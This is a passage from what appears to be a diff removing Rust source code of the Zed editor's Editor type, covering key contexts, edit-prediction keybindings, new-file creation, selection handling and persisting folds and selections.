key_context.add("showing_code_actions") - } - None => {} - } - - // Disable vim contexts when a sub-editor (e.g. rename/inline assistant) is focused. - if !self.focus_handle(cx).contains_focused(window, cx) - || (self.is_focused(window) || self.mouse_menu_is_focused(window, cx)) - { - for addon in self.addons.values() { - addon.extend_key_context(&mut key_context, cx) - } - } - - if let Some(singleton_buffer) = self.buffer.read(cx).as_singleton() { - if let Some(extension) = singleton_buffer - .read(cx) - .file() - .and_then(|file| file.path().extension()?.to_str()) - { - key_context.set("extension", extension.to_string()); - } - } else { - key_context.add("multibuffer"); - } - - if has_active_edit_prediction { - if self.edit_prediction_in_conflict() { - key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT); - } else { - key_context.add(EDIT_PREDICTION_KEY_CONTEXT); - key_context.add("copilot_suggestion"); - } - } - - if self.selection_mark_mode { - key_context.add("selection_mode"); - } - - key_context - } - - pub fn hide_mouse_cursor(&mut self, origin: &HideMouseCursorOrigin) { - self.mouse_cursor_hidden = match origin { - HideMouseCursorOrigin::TypingAction => { - matches!( - self.hide_mouse_mode, - HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement - ) - } - HideMouseCursorOrigin::MovementAction => { - matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) - } - }; - } - - pub fn edit_prediction_in_conflict(&self) -> bool { - if !self.show_edit_predictions_in_menu() { - return false; - } - - let showing_completions = self - .context_menu - .borrow() - .as_ref() - .map_or(false, |context| { - matches!(context, CodeContextMenu::Completions(_)) - }); - - showing_completions - || self.edit_prediction_requires_modifier() - // Require modifier key when the cursor is on leading whitespace, to allow `tab` - // bindings to insert tab characters. - || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict) - } - - pub fn accept_edit_prediction_keybind( - &self, - window: &Window, - cx: &App, - ) -> AcceptEditPredictionBinding { - let key_context = self.key_context_internal(true, window, cx); - let in_conflict = self.edit_prediction_in_conflict(); - - AcceptEditPredictionBinding( - window - .bindings_for_action_in_context(&AcceptEditPrediction, key_context) - .into_iter() - .filter(|binding| { - !in_conflict - || binding - .keystrokes() - .first() - .map_or(false, |keystroke| keystroke.modifiers.modified()) - }) - .rev() - .min_by_key(|binding| { - binding - .keystrokes() - .first() - .map_or(u8::MAX, |k| k.modifiers.number_of_modifiers()) - }), - ) - } - - pub fn new_file( - workspace: &mut Workspace, - _: &workspace::NewFile, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_in_workspace(workspace, window, cx).detach_and_prompt_err( - "Failed to create buffer", - window, - cx, - |e, _, _| match e.error_code() { - ErrorCode::RemoteUpgradeRequired => Some(format!( - "The remote instance of Zed does not support this yet. It must be upgraded to {}", - e.error_tag("required").unwrap_or("the latest version") - )), - _ => None, - }, - ); - } - - pub fn new_in_workspace( - workspace: &mut Workspace, - window: &mut Window, - cx: &mut Context, - ) -> Task>> { - let project = workspace.project().clone(); - let create = project.update(cx, |project, cx| project.create_buffer(cx)); - - cx.spawn_in(window, async move |workspace, cx| { - let buffer = create.await?; - workspace.update_in(cx, |workspace, window, cx| { - let editor = - cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)); - workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); - editor - }) - }) - } - - fn new_file_vertical( - workspace: &mut Workspace, - _: &workspace::NewFileSplitVertical, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_file_in_direction(workspace, SplitDirection::vertical(cx), window, cx) - } - - fn new_file_horizontal( - workspace: &mut Workspace, - _: &workspace::NewFileSplitHorizontal, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_file_in_direction(workspace, SplitDirection::horizontal(cx), window, cx) - } - - fn new_file_in_direction( - workspace: &mut Workspace, - direction: SplitDirection, - window: &mut Window, - cx: &mut Context, - ) { - let project = workspace.project().clone(); - let create = project.update(cx, |project, cx| project.create_buffer(cx)); - - cx.spawn_in(window, async move |workspace, cx| { - let buffer = create.await?; - workspace.update_in(cx, move |workspace, window, cx| { - workspace.split_item( - direction, - Box::new( - cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)), - ), - window, - cx, - ) - })?; - anyhow::Ok(()) - }) - .detach_and_prompt_err("Failed to create buffer", window, cx, |e, _, _| { - match e.error_code() { - ErrorCode::RemoteUpgradeRequired => Some(format!( - "The remote instance of Zed does not support this yet. It must be upgraded to {}", - e.error_tag("required").unwrap_or("the latest version") - )), - _ => None, - } - }); - } - - pub fn leader_peer_id(&self) -> Option { - self.leader_peer_id - } - - pub fn buffer(&self) -> &Entity { - &self.buffer - } - - pub fn workspace(&self) -> Option> { - self.workspace.as_ref()?.0.upgrade() - } - - pub fn title<'a>(&self, cx: &'a App) -> Cow<'a, str> { - self.buffer().read(cx).title(cx) - } - - pub fn snapshot(&self, window: &mut Window, cx: &mut App) -> EditorSnapshot { - let git_blame_gutter_max_author_length = self - .render_git_blame_gutter(cx) - .then(|| { - if let Some(blame) = self.blame.as_ref() { - let max_author_length = - blame.update(cx, |blame, cx| blame.max_author_length(cx)); - Some(max_author_length) - } else { - None - } - }) - .flatten(); - - EditorSnapshot { - mode: self.mode, - show_gutter: self.show_gutter, - show_line_numbers: self.show_line_numbers, - show_git_diff_gutter: self.show_git_diff_gutter, - show_code_actions: self.show_code_actions, - show_runnables: self.show_runnables, - show_breakpoints: self.show_breakpoints, - git_blame_gutter_max_author_length, - display_snapshot: self.display_map.update(cx, |map, cx| map.snapshot(cx)), - scroll_anchor: self.scroll_manager.anchor(), - ongoing_scroll: self.scroll_manager.ongoing_scroll(), - placeholder_text: self.placeholder_text.clone(), - is_focused: self.focus_handle.is_focused(window), - current_line_highlight: self - .current_line_highlight - .unwrap_or_else(|| EditorSettings::get_global(cx).current_line_highlight), - gutter_hovered: self.gutter_hovered, - } - } - - pub fn language_at(&self, point: T, cx: &App) -> Option> { - self.buffer.read(cx).language_at(point, cx) - } - - pub fn file_at(&self, point: T, cx: &App) -> Option> { - self.buffer.read(cx).read(cx).file_at(point).cloned() - } - - pub fn active_excerpt( - &self, - cx: &App, - ) -> Option<(ExcerptId, Entity, Range)> { - self.buffer - .read(cx) - .excerpt_containing(self.selections.newest_anchor().head(), cx) - } - - pub fn mode(&self) -> EditorMode { - self.mode - } - - pub fn set_mode(&mut self, mode: EditorMode) { - self.mode = mode; - } - - pub fn collaboration_hub(&self) -> Option<&dyn CollaborationHub> { - self.collaboration_hub.as_deref() - } - - pub fn set_collaboration_hub(&mut self, hub: Box) { - self.collaboration_hub = Some(hub); - } - - pub fn set_in_project_search(&mut self, in_project_search: bool) { - self.in_project_search = in_project_search; - } - - pub fn set_custom_context_menu( - &mut self, - f: impl 'static - + Fn( - &mut Self, - DisplayPoint, - &mut Window, - &mut Context, - ) -> Option>, - ) { - self.custom_context_menu = Some(Box::new(f)) - } - - pub fn set_completion_provider(&mut self, provider: Option>) { - self.completion_provider = provider; - } - - pub fn semantics_provider(&self) -> Option> { - self.semantics_provider.clone() - } - - pub fn set_semantics_provider(&mut self, provider: Option>) { - self.semantics_provider = provider; - } - - pub fn set_edit_prediction_provider( - &mut self, - provider: Option>, - window: &mut Window, - cx: &mut Context, - ) where - T: EditPredictionProvider, - { - self.edit_prediction_provider = - provider.map(|provider| RegisteredInlineCompletionProvider { - _subscription: cx.observe_in(&provider, window, |this, _, window, cx| { - if this.focus_handle.is_focused(window) { - this.update_visible_inline_completion(window, cx); - } - }), - provider: Arc::new(provider), - }); - self.update_edit_prediction_settings(cx); - self.refresh_inline_completion(false, false, window, cx); - } - - pub fn placeholder_text(&self) -> Option<&str> { - self.placeholder_text.as_deref() - } - - pub fn set_placeholder_text( - &mut self, - placeholder_text: impl Into>, - cx: &mut Context, - ) { - let placeholder_text = Some(placeholder_text.into()); - if self.placeholder_text != placeholder_text { - self.placeholder_text = placeholder_text; - cx.notify(); - } - } - - pub fn set_cursor_shape(&mut self, cursor_shape: CursorShape, cx: &mut Context) { - self.cursor_shape = cursor_shape; - - // Disrupt blink for immediate user feedback that the cursor shape has changed - self.blink_manager.update(cx, BlinkManager::show_cursor); - - cx.notify(); - } - - pub fn set_current_line_highlight( - &mut self, - current_line_highlight: Option, - ) { - self.current_line_highlight = current_line_highlight; - } - - pub fn set_collapse_matches(&mut self, collapse_matches: bool) { - self.collapse_matches = collapse_matches; - } - - fn register_buffers_with_language_servers(&mut self, cx: &mut Context) { - let buffers = self.buffer.read(cx).all_buffers(); - let Some(project) = self.project.as_ref() else { - return; - }; - project.update(cx, |project, cx| { - for buffer in buffers { - self.registered_buffers - .entry(buffer.read(cx).remote_id()) - .or_insert_with(|| project.register_buffer_with_language_servers(&buffer, cx)); - } - }) - } - - pub fn range_for_match(&self, range: &Range) -> Range { - if self.collapse_matches { - return range.start..range.start; - } - range.clone() - } - - pub fn set_clip_at_line_ends(&mut self, clip: bool, cx: &mut Context) { - if self.display_map.read(cx).clip_at_line_ends != clip { - self.display_map - .update(cx, |map, _| map.clip_at_line_ends = clip); - } - } - - pub fn set_input_enabled(&mut self, input_enabled: bool) { - self.input_enabled = input_enabled; - } - - pub fn set_inline_completions_hidden_for_vim_mode( - &mut self, - hidden: bool, - window: &mut Window, - cx: &mut Context, - ) { - if hidden != self.inline_completions_hidden_for_vim_mode { - self.inline_completions_hidden_for_vim_mode = hidden; - if hidden { - self.update_visible_inline_completion(window, cx); - } else { - self.refresh_inline_completion(true, false, window, cx); - } - } - } - - pub fn set_menu_inline_completions_policy(&mut self, value: MenuInlineCompletionsPolicy) { - self.menu_inline_completions_policy = value; - } - - pub fn set_autoindent(&mut self, autoindent: bool) { - if autoindent { - self.autoindent_mode = Some(AutoindentMode::EachLine); - } else { - self.autoindent_mode = None; - } - } - - pub fn read_only(&self, cx: &App) -> bool { - self.read_only || self.buffer.read(cx).read_only() - } - - pub fn set_read_only(&mut self, read_only: bool) { - self.read_only = read_only; - } - - pub fn set_use_autoclose(&mut self, autoclose: bool) { - self.use_autoclose = autoclose; - } - - pub fn set_use_auto_surround(&mut self, auto_surround: bool) { - self.use_auto_surround = auto_surround; - } - - pub fn set_auto_replace_emoji_shortcode(&mut self, auto_replace: bool) { - self.auto_replace_emoji_shortcode = auto_replace; - } - - pub fn toggle_edit_predictions( - &mut self, - _: &ToggleEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.show_inline_completions_override.is_some() { - self.set_show_edit_predictions(None, window, cx); - } else { - let show_edit_predictions = !self.edit_predictions_enabled(); - self.set_show_edit_predictions(Some(show_edit_predictions), window, cx); - } - } - - pub fn set_show_edit_predictions( - &mut self, - show_edit_predictions: Option, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_completions_override = show_edit_predictions; - self.update_edit_prediction_settings(cx); - - if let Some(false) = show_edit_predictions { - self.discard_inline_completion(false, cx); - } else { - self.refresh_inline_completion(false, true, window, cx); - } - } - - fn inline_completions_disabled_in_scope( - &self, - buffer: &Entity, - buffer_position: language::Anchor, - cx: &App, - ) -> bool { - let snapshot = buffer.read(cx).snapshot(); - let settings = snapshot.settings_at(buffer_position, cx); - - let Some(scope) = snapshot.language_scope_at(buffer_position) else { - return false; - }; - - scope.override_name().map_or(false, |scope_name| { - settings - .edit_predictions_disabled_in - .iter() - .any(|s| s == scope_name) - }) - } - - pub fn set_use_modal_editing(&mut self, to: bool) { - self.use_modal_editing = to; - } - - pub fn use_modal_editing(&self) -> bool { - self.use_modal_editing - } - - fn selections_did_change( - &mut self, - local: bool, - old_cursor_position: &Anchor, - show_completions: bool, - window: &mut Window, - cx: &mut Context, - ) { - window.invalidate_character_coordinates(); - - // Copy selections to primary selection buffer - #[cfg(any(target_os = "linux", target_os = "freebsd"))] - if local { - let selections = self.selections.all::(cx); - let buffer_handle = self.buffer.read(cx).read(cx); - - let mut text = String::new(); - for (index, selection) in selections.iter().enumerate() { - let text_for_selection = buffer_handle - .text_for_range(selection.start..selection.end) - .collect::(); - - text.push_str(&text_for_selection); - if index != selections.len() - 1 { - text.push('\n'); - } - } - - if !text.is_empty() { - cx.write_to_primary(ClipboardItem::new_string(text)); - } - } - - if self.focus_handle.is_focused(window) && self.leader_peer_id.is_none() { - self.buffer.update(cx, |buffer, cx| { - buffer.set_active_selections( - &self.selections.disjoint_anchors(), - self.selections.line_mode, - self.cursor_shape, - cx, - ) - }); - } - let display_map = self - .display_map - .update(cx, |display_map, cx| display_map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - self.add_selections_state = None; - self.select_next_state = None; - self.select_prev_state = None; - self.select_syntax_node_history.try_clear(); - self.invalidate_autoclose_regions(&self.selections.disjoint_anchors(), buffer); - self.snippet_stack - .invalidate(&self.selections.disjoint_anchors(), buffer); - self.take_rename(false, window, cx); - - let new_cursor_position = self.selections.newest_anchor().head(); - - self.push_to_nav_history( - *old_cursor_position, - Some(new_cursor_position.to_point(buffer)), - false, - cx, - ); - - if local { - let new_cursor_position = self.selections.newest_anchor().head(); - let mut context_menu = self.context_menu.borrow_mut(); - let completion_menu = match context_menu.as_ref() { - Some(CodeContextMenu::Completions(menu)) => Some(menu), - _ => { - *context_menu = None; - None - } - }; - if let Some(buffer_id) = new_cursor_position.buffer_id { - if !self.registered_buffers.contains_key(&buffer_id) { - if let Some(project) = self.project.as_ref() { - project.update(cx, |project, cx| { - let Some(buffer) = self.buffer.read(cx).buffer(buffer_id) else { - return; - }; - self.registered_buffers.insert( - buffer_id, - project.register_buffer_with_language_servers(&buffer, cx), - ); - }) - } - } - } - - if let Some(completion_menu) = completion_menu { - let cursor_position = new_cursor_position.to_offset(buffer); - let (word_range, kind) = - buffer.surrounding_word(completion_menu.initial_position, true); - if kind == Some(CharKind::Word) - && word_range.to_inclusive().contains(&cursor_position) - { - let mut completion_menu = completion_menu.clone(); - drop(context_menu); - - let query = Self::completion_query(buffer, cursor_position); - cx.spawn(async move |this, cx| { - completion_menu - .filter(query.as_deref(), cx.background_executor().clone()) - .await; - - this.update(cx, |this, cx| { - let mut context_menu = this.context_menu.borrow_mut(); - let Some(CodeContextMenu::Completions(menu)) = context_menu.as_ref() - else { - return; - }; - - if menu.id > completion_menu.id { - return; - } - - *context_menu = Some(CodeContextMenu::Completions(completion_menu)); - drop(context_menu); - cx.notify(); - }) - }) - .detach(); - - if show_completions { - self.show_completions(&ShowCompletions { trigger: None }, window, cx); - } - } else { - drop(context_menu); - self.hide_context_menu(window, cx); - } - } else { - drop(context_menu); - } - - hide_hover(self, cx); - - if old_cursor_position.to_display_point(&display_map).row() - != new_cursor_position.to_display_point(&display_map).row() - { - self.available_code_actions.take(); - } - self.refresh_code_actions(window, cx); - self.refresh_document_highlights(cx); - self.refresh_selected_text_highlights(false, window, cx); - refresh_matching_bracket_highlights(self, window, cx); - self.update_visible_inline_completion(window, cx); - self.edit_prediction_requires_modifier_in_indent_conflict = true; - linked_editing_ranges::refresh_linked_ranges(self, window, cx); - self.inline_blame_popover.take(); - if self.git_blame_inline_enabled { - self.start_inline_blame_timer(window, cx); - } - } - - self.blink_manager.update(cx, BlinkManager::pause_blinking); - cx.emit(EditorEvent::SelectionsChanged { local }); - - let selections = &self.selections.disjoint; - if selections.len() == 1 { - cx.emit(SearchEvent::ActiveMatchChanged) - } - if local { - if let Some((_, _, buffer_snapshot)) = buffer.as_singleton() { - let inmemory_selections = selections - .iter() - .map(|s| { - text::ToPoint::to_point(&s.range().start.text_anchor, buffer_snapshot) - ..text::ToPoint::to_point(&s.range().end.text_anchor, buffer_snapshot) - }) - .collect(); - self.update_restoration_data(cx, |data| { - data.selections = inmemory_selections; - }); - - if WorkspaceSettings::get(None, cx).restore_on_startup - != RestoreOnStartupBehavior::None - { - if let Some(workspace_id) = - self.workspace.as_ref().and_then(|workspace| workspace.1) - { - let snapshot = self.buffer().read(cx).snapshot(cx); - let selections = selections.clone(); - let background_executor = cx.background_executor().clone(); - let editor_id = cx.entity().entity_id().as_u64() as ItemId; - self.serialize_selections = cx.background_spawn(async move { - background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; - let db_selections = selections - .iter() - .map(|selection| { - ( - selection.start.to_offset(&snapshot), - selection.end.to_offset(&snapshot), - ) - }) - .collect(); - - DB.save_editor_selections(editor_id, workspace_id, db_selections) - .await - .with_context(|| format!("persisting editor selections for editor {editor_id}, workspace {workspace_id:?}")) - .log_err(); - }); - } - } - } - } - - cx.notify(); - } - - fn folds_did_change(&mut self, cx: &mut Context) { - use text::ToOffset as _; - use text::ToPoint as _; - - if WorkspaceSettings::get(None, cx).restore_on_startup == RestoreOnStartupBehavior::None { - return; - } - - let Some(singleton) = self.buffer().read(cx).as_singleton() else { - return; - }; - - let snapshot = singleton.read(cx).snapshot(); - let inmemory_folds = self.display_map.update(cx, |display_map, cx| { - let display_snapshot = display_map.snapshot(cx); - - display_snapshot - .folds_in_range(0..display_snapshot.buffer_snapshot.len()) - .map(|fold| { - fold.range.start.text_anchor.to_point(&snapshot) - ..fold.range.end.text_anchor.to_point(&snapshot) - }) - .collect() - }); - self.update_restoration_data(cx, |data| { - data.folds = inmemory_folds; - }); - - let Some(workspace_id) = self.workspace.as_ref().and_then(|workspace| workspace.1) else { - return; - }; - let background_executor = cx.background_executor().clone(); - let editor_id = cx.entity().entity_id().as_u64() as ItemId; - let db_folds = self.display_map.update(cx, |display_map, cx| { - display_map - .snapshot(cx) - .folds_in_range(0..snapshot.len()) - .map(|fold| { - ( - fold.range.start.text_anchor.to_offset(&snapshot), - fold.range.end.text_anchor.to_offset(&snapshot), - ) - }) - .collect() - }); - self.serialize_folds = cx.background_spawn(async move { - background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; - DB.save_editor_folds(editor_id, workspace_id, db_folds) - .await - .with_context(|| { - format!( - "persisting editor folds for editor {editor_id}, workspace {workspace_id:?}" - ) - }) - .log_err(); - }); - } - - pub fn sync_selections( - &mut self, - other: Entity, - cx: &mut Context, - ) -> gpui::Subscription { - let other_selections = other.read(cx).selections.disjoint.to_vec(); - self.selections.change_with(cx, |selections| { - selections.select_anchors(other_selections); - }); - - let other_subscription = - cx.subscribe(&other, |this, other, other_evt, cx| match other_evt { - EditorEvent::SelectionsChanged { local: true } => { - let other_selections = other.read(cx).selections.disjoint.to_vec(); - if other_selections.is_empty() { - return; - } - this.selections.change_with(cx, |selections| { - selections.select_anchors(other_selections); - }); - } - _ => {} - }); - - let this_subscription = - cx.subscribe_self::(move |this, this_evt, cx| match this_evt { - EditorEvent::SelectionsChanged { local: true } => { - let these_selections = this.selections.disjoint.to_vec(); - if these_selections.is_empty() { - return; - } - other.update(cx, |other_editor, cx| { - other_editor.selections.change_with(cx, |selections| { - selections.select_anchors(these_selections); - }) - }); - } - _ => {} - }); - - Subscription::join(other_subscription, this_subscription) - } - - pub fn change_selections( - &mut self, - autoscroll: Option, - window: &mut Window, - cx: &mut Context, - change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, - ) -> R { - self.change_selections_inner(autoscroll, true, window, cx, change) - } - - fn change_selections_inner( - &mut self, - autoscroll: Option, - request_completions: bool, - window: &mut Window, - cx: &mut Context, - change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, - ) -> R { - let old_cursor_position = self.selections.newest_anchor().head(); - self.push_to_selection_history(); - - let (changed, result) = self.selections.change_with(cx, change); - - if changed { - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - self.selections_did_change(true, &old_cursor_position, request_completions, window, cx); - - if self.should_open_signature_help_automatically( - &old_cursor_position, - self.signature_help_state.backspace_pressed(), - cx, - ) { - self.show_signature_help(&ShowSignatureHelp, window, cx); - } - self.signature_help_state.set_backspace_pressed(false); - } - - result - } - - pub fn edit(&mut self, edits: I, cx: &mut Context) - where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - } - - pub fn edit_with_autoindent(&mut self, edits: I, cx: &mut Context) - where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, self.autoindent_mode.clone(), cx) - }); - } - - pub fn edit_with_block_indent( - &mut self, - edits: I, - original_indent_columns: Vec>, - cx: &mut Context, - ) where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer.update(cx, |buffer, cx| { - buffer.edit( - edits, - Some(AutoindentMode::Block { - original_indent_columns, - }), - cx, - ) - }); - } - - fn select(&mut self, phase: SelectPhase, window: &mut Window, cx: &mut Context) { - self.hide_context_menu(window, cx); - - match phase { - SelectPhase::Begin { - position, - add, - click_count, - } => self.begin_selection(position, add, click_count, window, cx), - SelectPhase::BeginColumnar { - position, - goal_column, - reset, - } => self.begin_columnar_selection(position, goal_column, reset, window, cx), - SelectPhase::Extend { - position, - click_count, - } => self.extend_selection(position, click_count, window, cx), - SelectPhase::Update { - position, - goal_column, - scroll_delta, - } => self.update_selection(position, goal_column, scroll_delta, window, cx), - SelectPhase::End => self.end_selection(window, cx), - } - } - - fn extend_selection( - &mut self, - position: DisplayPoint, - click_count: usize, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let tail = self.selections.newest::(cx).tail(); - self.begin_selection(position, false, click_count, window, cx); - - let position = position.to_offset(&display_map, Bias::Left); - let tail_anchor = display_map.buffer_snapshot.anchor_before(tail); - - let mut pending_selection = self - .selections - .pending_anchor() - .expect("extend_selection not called with pending selection"); - if position >= tail { - pending_selection.start = tail_anchor; - } else { - pending_selection.end = tail_anchor; - pending_selection.reversed = true; - } - - let mut pending_mode = self.selections.pending_mode().unwrap(); - match &mut pending_mode { - SelectMode::Word(range) | SelectMode::Line(range) => *range = tail_anchor..tail_anchor, - _ => {} - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.set_pending(pending_selection, pending_mode) - }); - } - - fn begin_selection( - &mut self, - position: DisplayPoint, - add: bool, - click_count: usize, - window: &mut Window, - cx: &mut Context, - ) { - if !self.focus_handle.is_focused(window) { - self.last_focused_descendant = None; - window.focus(&self.focus_handle); - } - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let newest_selection = self.selections.newest_anchor().clone(); - let position = display_map.clip_point(position, Bias::Left); - - let start; - let end; - let mode; - let mut auto_scroll; - match click_count { - 1 => { - start = buffer.anchor_before(position.to_point(&display_map)); - end = start; - mode = SelectMode::Character; - auto_scroll = true; - } - 2 => { - let range = movement::surrounding_word(&display_map, position); - start = buffer.anchor_before(range.start.to_point(&display_map)); - end = buffer.anchor_before(range.end.to_point(&display_map)); - mode = SelectMode::Word(start..end); - auto_scroll = true; - } - 3 => { - let position = display_map - .clip_point(position, Bias::Left) - .to_point(&display_map); - let line_start = display_map.prev_line_boundary(position).0; - let next_line_start = buffer.clip_point( - display_map.next_line_boundary(position).0 + Point::new(1, 0), - Bias::Left, - ); - start = buffer.anchor_before(line_start); - end = buffer.anchor_before(next_line_start); - mode = SelectMode::Line(start..end); - auto_scroll = true; - } - _ => { - start = buffer.anchor_before(0); - end = buffer.anchor_before(buffer.len()); - mode = SelectMode::All; - auto_scroll = false; - } - } - auto_scroll &= EditorSettings::get_global(cx).autoscroll_on_clicks; - - let point_to_delete: Option = { - let selected_points: Vec> = - self.selections.disjoint_in_range(start..end, cx); - - if !add || click_count > 1 { - None - } else if !selected_points.is_empty() { - Some(selected_points[0].id) - } else { - let clicked_point_already_selected = - self.selections.disjoint.iter().find(|selection| { - selection.start.to_point(buffer) == start.to_point(buffer) - || selection.end.to_point(buffer) == end.to_point(buffer) - }); - - clicked_point_already_selected.map(|selection| selection.id) - } - }; - - let selections_count = self.selections.count(); - - self.change_selections(auto_scroll.then(Autoscroll::newest), window, cx, |s| { - if let Some(point_to_delete) = point_to_delete { - s.delete(point_to_delete); - - if selections_count == 1 { - s.set_pending_anchor_range(start..end, mode); - } - } else { - if !add { - s.clear_disjoint(); - } else if click_count > 1 { - s.delete(newest_selection.id) - } - - s.set_pending_anchor_range(start..end, mode); - } - }); - } - - fn begin_columnar_selection( - &mut self, - position: DisplayPoint, - goal_column: u32, - reset: bool, - window: &mut Window, - cx: &mut Context, - ) { - if !self.focus_handle.is_focused(window) { - self.last_focused_descendant = None; - window.focus(&self.focus_handle); - } - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if reset { - let pointer_position = display_map - .buffer_snapshot - .anchor_before(position.to_point(&display_map)); - - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - s.clear_disjoint(); - s.set_pending_anchor_range( - pointer_position..pointer_position, - SelectMode::Character, - ); - }); - } - - let tail = self.selections.newest::(cx).tail(); - self.columnar_selection_tail = Some(display_map.buffer_snapshot.anchor_before(tail)); - - if !reset { - self.select_columns( - tail.to_display_point(&display_map), - position, - goal_column, - &display_map, - window, - cx, - ); - } - } - - fn update_selection( - &mut self, - position: DisplayPoint, - goal_column: u32, - scroll_delta: gpui::Point, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if let Some(tail) = self.columnar_selection_tail.as_ref() { - let tail = tail.to_display_point(&display_map); - self.select_columns(tail, position, goal_column, &display_map, window, cx); - } else if let Some(mut pending) = self.selections.pending_anchor() { - let buffer = self.buffer.read(cx).snapshot(cx); - let head; - let tail; - let mode = self.selections.pending_mode().unwrap(); - match &mode { - SelectMode::Character => { - head = position.to_point(&display_map); - tail = pending.tail().to_point(&buffer); - } - SelectMode::Word(original_range) => { - let original_display_range = original_range.start.to_display_point(&display_map) - ..original_range.end.to_display_point(&display_map); - let original_buffer_range = original_display_range.start.to_point(&display_map) - ..original_display_range.end.to_point(&display_map); - if movement::is_inside_word(&display_map, position) - || original_display_range.contains(&position) - { - let word_range = movement::surrounding_word(&display_map, position); - if word_range.start < original_display_range.start { - head = word_range.start.to_point(&display_map); - } else { - head = word_range.end.to_point(&display_map); - } - } else { - head = position.to_point(&display_map); - } - - if head <= original_buffer_range.start { - tail = original_buffer_range.end; - } else { - tail = original_buffer_range.start; - } - } - SelectMode::Line(original_range) => { - let original_range = original_range.to_point(&display_map.buffer_snapshot); - - let position = display_map - .clip_point(position, Bias::Left) - .to_point(&display_map); - let line_start = display_map.prev_line_boundary(position).0; - let next_line_start = buffer.clip_point( - display_map.next_line_boundary(position).0 + Point::new(1, 0), - Bias::Left, - ); - - if line_start < original_range.start { - head = line_start - } else { - head = next_line_start - } - - if head <= original_range.start { - tail = original_range.end; - } else { - tail = original_range.start; - } - } - SelectMode::All => { - return; - } - }; - - if head < tail { - pending.start = buffer.anchor_before(head); - pending.end = buffer.anchor_before(tail); - pending.reversed = true; - } else { - pending.start = buffer.anchor_before(tail); - pending.end = buffer.anchor_before(head); - pending.reversed = false; - } - - self.change_selections(None, window, cx, |s| { - s.set_pending(pending, mode); - }); - } else { - log::error!("update_selection dispatched with no pending selection"); - return; - } - - self.apply_scroll_delta(scroll_delta, window, cx); - cx.notify(); - } - - fn end_selection(&mut self, window: &mut Window, cx: &mut Context) { - self.columnar_selection_tail.take(); - if self.selections.pending_anchor().is_some() { - let selections = self.selections.all::(cx); - self.change_selections(None, window, cx, |s| { - s.select(selections); - s.clear_pending(); - }); - } - } - - fn select_columns( - &mut self, - tail: DisplayPoint, - head: DisplayPoint, - goal_column: u32, - display_map: &DisplaySnapshot, - window: &mut Window, - cx: &mut Context, - ) { - let start_row = cmp::min(tail.row(), head.row()); - let end_row = cmp::max(tail.row(), head.row()); - let start_column = cmp::min(tail.column(), goal_column); - let end_column = cmp::max(tail.column(), goal_column); - let reversed = start_column < tail.column(); - - let selection_ranges = (start_row.0..=end_row.0) - .map(DisplayRow) - .filter_map(|row| { - if start_column <= display_map.line_len(row) && !display_map.is_block_line(row) { - let start = display_map - .clip_point(DisplayPoint::new(row, start_column), Bias::Left) - .to_point(display_map); - let end = display_map - .clip_point(DisplayPoint::new(row, end_column), Bias::Right) - .to_point(display_map); - if reversed { - Some(end..start) - } else { - Some(start..end) - } - } else { - None - } - }) - .collect::>(); - - self.change_selections(None, window, cx, |s| { - s.select_ranges(selection_ranges); - }); - cx.notify(); - } - - pub fn has_non_empty_selection(&self, cx: &mut App) -> bool { - self.selections - .all_adjusted(cx) - .iter() - .any(|selection| !selection.is_empty()) - } - - pub fn has_pending_nonempty_selection(&self) -> bool { - let pending_nonempty_selection = match self.selections.pending_anchor() { - Some(Selection { start, end, .. }) => start != end, - None => false, - }; - - pending_nonempty_selection - || (self.columnar_selection_tail.is_some() && self.selections.disjoint.len() > 1) - } - - pub fn has_pending_selection(&self) -> bool { - self.selections.pending_anchor().is_some() || self.columnar_selection_tail.is_some() - } - - pub fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { - self.selection_mark_mode = false; - - if self.clear_expanded_diff_hunks(cx) { - cx.notify(); - return; - } - if self.dismiss_menus_and_popups(true, window, cx) { - return; - } - - if self.mode.is_full() - && self.change_selections(Some(Autoscroll::fit()), window, cx, |s| s.try_cancel()) - { - return; - } - - cx.propagate(); - } - - pub fn dismiss_menus_and_popups( - &mut self, - is_user_requested: bool, - window: &mut Window, - cx: &mut Context, - ) -> bool { - if self.take_rename(false, window, cx).is_some() { - return true; - } - - if hide_hover(self, cx) { - return true; - } - - if self.hide_signature_help(cx, SignatureHelpHiddenBy::Escape) { - return true; - } - - if self.hide_context_menu(window, cx).is_some() { - return true; - } - - if self.mouse_context_menu.take().is_some() { - return true; - } - - if is_user_requested && self.discard_inline_completion(true, cx) { - return true; - } - - if self.snippet_stack.pop().is_some() { - return true; - } - - if 